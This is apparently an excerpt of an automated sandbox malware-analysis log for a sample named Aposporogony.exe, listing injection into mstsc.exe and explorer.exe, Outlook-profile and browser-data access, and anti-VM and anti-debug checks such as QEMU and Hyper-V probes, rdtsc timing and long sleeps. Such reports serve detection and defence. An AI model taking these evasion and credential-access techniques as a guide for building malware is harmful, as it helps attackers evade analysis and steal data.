      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\Aposporogony.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
      Source: 231-EqK-.6.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
      Source: C:\Users\user\Desktop\Aposporogony.exeFile created: C:\Program Files (x86)\KiwifrugtensJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeFile written: C:\Users\user\AppData\Local\Temp\Dybfrossen.iniJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Phloroglucic\Poisonings\Gytling\IstandJump to behavior
      Source: Aposporogony.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: Aposporogony.exe, 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2017191835.000000001D4AA000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2023445771.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2225655729.000000000440A000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2220670268.000000000425B000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Aposporogony.exe, Aposporogony.exe, 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2017191835.000000001D4AA000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2023445771.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000003.2225655729.000000000440A000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2220670268.000000000425B000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdbGCTL source: Aposporogony.exe, 00000004.00000003.2210470359.000000001D613000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2213382254.000000001DB63000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2240646207.000000001D610000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: Aposporogony.exe, 00000004.00000003.2210470359.000000001D613000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2213382254.000000001DB63000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2240646207.000000001D610000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: firefox.pdb source: mstsc.exe, 00000006.00000003.2922634509.0000000007417000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2985837581.000000000759F000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.1828325700.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_73D22FD0 push eax; ret 0_2_73D22FFE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03485B5C pushfd ; retf 0_2_03485B61
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348624E push ecx; iretd 0_2_03486250
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348463F pushad ; retf 0_2_03484640
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8408CD push ecx; mov dword ptr [esp], ecx4_2_1D8408D6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8197A1 push es; iretd 4_2_1D8197A8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8121AD pushad ; retf 0004h4_2_1D81223F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045E08CD push ecx; mov dword ptr [esp], ecx6_2_045E08D6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004183EF push ecx; retf 6_2_00418400
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004183A9 pushad ; ret 6_2_004183AB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041859D push D358F441h; iretd 6_2_004185A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041884B push eax; iretd 6_2_0041884C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041F955 push eax; ret 6_2_0041F9A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041F9A2 push eax; ret 6_2_0041F9A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041F9AB push eax; ret 6_2_0041FA12
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041FA0C push eax; ret 6_2_0041FA12
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00406CAF push edi; retf 6_2_00406CB1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_73D21B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73D21B63
      Source: C:\Users\user\Desktop\Aposporogony.exeFile created: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Aposporogony.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 8504Thread sleep count: 110 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 8504Thread sleep time: -220000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7848Thread sleep time: -105000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7848Thread sleep count: 65 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7848Thread sleep time: -65000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7848Thread sleep count: 78 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7848Thread sleep time: -78000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480348 rdtsc 0_2_03480348
      Source: C:\Users\user\Desktop\Aposporogony.exeAPI coverage: 1.2 %
      Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 3.1 %
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00412C80 FindFirstFileW,FindNextFileW,FindClose,6_2_00412C80
      Source: C:\Users\user\Desktop\Aposporogony.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeAPI call chain: ExitProcess graph end nodegraph_0-11479
      Source: C:\Users\user\Desktop\Aposporogony.exeAPI call chain: ExitProcess graph end nodegraph_0-11634
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: Aposporogony.exe, 00000004.00000002.2222039594.00000000019A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Aposporogony.exe, 00000004.00000003.2022141130.0000000001A10000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2222850216.0000000001A10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: explorer.exe, 00000007.00000000.2486217249.0000000009632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2634768809.0000000009632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2347276349.0000000009632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2557378717.0000000009632000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: Aposporogony.exe, 00000004.00000003.2022141130.0000000001A10000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2222850216.0000000001A10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: Aposporogony.exe, 00000000.00000002.2043659669.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Aposporogony.exe, 00000004.00000002.2223708381.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: firefox.exe, 0000000B.00000002.2995008662.000001F63A1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_73D21B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73D21B63
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480348 rdtsc 0_2_03480348
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A3FF1 mov eax, dword ptr fs:[00000030h]0_2_034A3FF1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03487910 mov eax, dword ptr fs:[00000030h]0_2_03487910
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034915E6 mov eax, dword ptr fs:[00000030h]0_2_034915E6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A206E mov eax, dword ptr fs:[00000030h]0_2_034A206E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CD8A mov eax, dword ptr fs:[00000030h]4_2_1D83CD8A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CD8A mov eax, dword ptr fs:[00000030h]4_2_1D83CD8A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D846D91 mov eax, dword ptr fs:[00000030h]4_2_1D846D91
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D836DA6 mov eax, dword ptr fs:[00000030h]4_2_1D836DA6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D847DB6 mov eax, dword ptr fs:[00000030h]4_2_1D847DB6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83DDB0 mov eax, dword ptr fs:[00000030h]4_2_1D83DDB0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914DA7 mov eax, dword ptr fs:[00000030h]4_2_1D914DA7
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872DBC mov eax, dword ptr fs:[00000030h]4_2_1D872DBC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872DBC mov ecx, dword ptr fs:[00000030h]4_2_1D872DBC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D838DCD mov eax, dword ptr fs:[00000030h]4_2_1D838DCD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FADD6 mov eax, dword ptr fs:[00000030h]4_2_1D8FADD6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FADD6 mov eax, dword ptr fs:[00000030h]4_2_1D8FADD6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84BDE0 mov eax, dword ptr fs:[00000030h]4_2_1D84BDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86FDE0 mov eax, dword ptr fs:[00000030h]4_2_1D86FDE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83EDFA mov eax, dword ptr fs:[00000030h]4_2_1D83EDFA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h]4_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90CDEB mov eax, dword ptr fs:[00000030h]4_2_1D90CDEB
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90CDEB mov eax, dword ptr fs:[00000030h]4_2_1D90CDEB
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD00 mov eax, dword ptr fs:[00000030h]4_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD00 mov eax, dword ptr fs:[00000030h]4_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD00 mov eax, dword ptr fs:[00000030h]4_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD00 mov eax, dword ptr fs:[00000030h]4_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD00 mov eax, dword ptr fs:[00000030h]4_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD00 mov eax, dword ptr fs:[00000030h]4_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D860D01 mov eax, dword ptr fs:[00000030h]4_2_1D860D01
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FBD08 mov eax, dword ptr fs:[00000030h]4_2_1D8FBD08
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FBD08 mov eax, dword ptr fs:[00000030h]4_2_1D8FBD08
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D8D0A mov eax, dword ptr fs:[00000030h]4_2_1D8D8D0A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CCD00 mov eax, dword ptr fs:[00000030h]4_2_1D8CCD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CCD00 mov eax, dword ptr fs:[00000030h]4_2_1D8CCD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86CD10 mov eax, dword ptr fs:[00000030h]4_2_1D86CD10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86CD10 mov ecx, dword ptr fs:[00000030h]4_2_1D86CD10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83FD20 mov eax, dword ptr fs:[00000030h]4_2_1D83FD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov ecx, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AD20 mov eax, dword ptr fs:[00000030h]4_2_1D86AD20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8F0D24 mov eax, dword ptr fs:[00000030h]4_2_1D8F0D24
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8F0D24 mov eax, dword ptr fs:[00000030h]4_2_1D8F0D24
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8F0D24 mov eax, dword ptr fs:[00000030h]4_2_1D8F0D24
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8F0D24 mov eax, dword ptr fs:[00000030h]4_2_1D8F0D24
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D839D46 mov eax, dword ptr fs:[00000030h]4_2_1D839D46
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D839D46 mov eax, dword ptr fs:[00000030h]4_2_1D839D46
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D839D46 mov ecx, dword ptr fs:[00000030h]4_2_1D839D46
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DD4D mov eax, dword ptr fs:[00000030h]4_2_1D85DD4D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DD4D mov eax, dword ptr fs:[00000030h]4_2_1D85DD4D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DD4D mov eax, dword ptr fs:[00000030h]4_2_1D85DD4D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BCD40 mov eax, dword ptr fs:[00000030h]4_2_1D8BCD40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BCD40 mov eax, dword ptr fs:[00000030h]4_2_1D8BCD40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1D5E mov eax, dword ptr fs:[00000030h]4_2_1D8C1D5E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D905D43 mov eax, dword ptr fs:[00000030h]4_2_1D905D43
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D905D43 mov eax, dword ptr fs:[00000030h]4_2_1D905D43
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D841D50 mov eax, dword ptr fs:[00000030h]4_2_1D841D50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D841D50 mov eax, dword ptr fs:[00000030h]4_2_1D841D50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914D4B mov eax, dword ptr fs:[00000030h]4_2_1D914D4B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D855D60 mov eax, dword ptr fs:[00000030h]4_2_1D855D60
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C5D60 mov eax, dword ptr fs:[00000030h]4_2_1D8C5D60
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D915D65 mov eax, dword ptr fs:[00000030h]4_2_1D915D65
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BD71 mov eax, dword ptr fs:[00000030h]4_2_1D87BD71
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BD71 mov eax, dword ptr fs:[00000030h]4_2_1D87BD71
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E6D79 mov esi, dword ptr fs:[00000030h]4_2_1D8E6D79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837C85 mov eax, dword ptr fs:[00000030h]4_2_1D837C85
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837C85 mov eax, dword ptr fs:[00000030h]4_2_1D837C85
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837C85 mov eax, dword ptr fs:[00000030h]4_2_1D837C85
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837C85 mov eax, dword ptr fs:[00000030h]4_2_1D837C85
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837C85 mov eax, dword ptr fs:[00000030h]4_2_1D837C85
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C3C80 mov ecx, dword ptr fs:[00000030h]4_2_1D8C3C80
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D847C95 mov eax, dword ptr fs:[00000030h]4_2_1D847C95
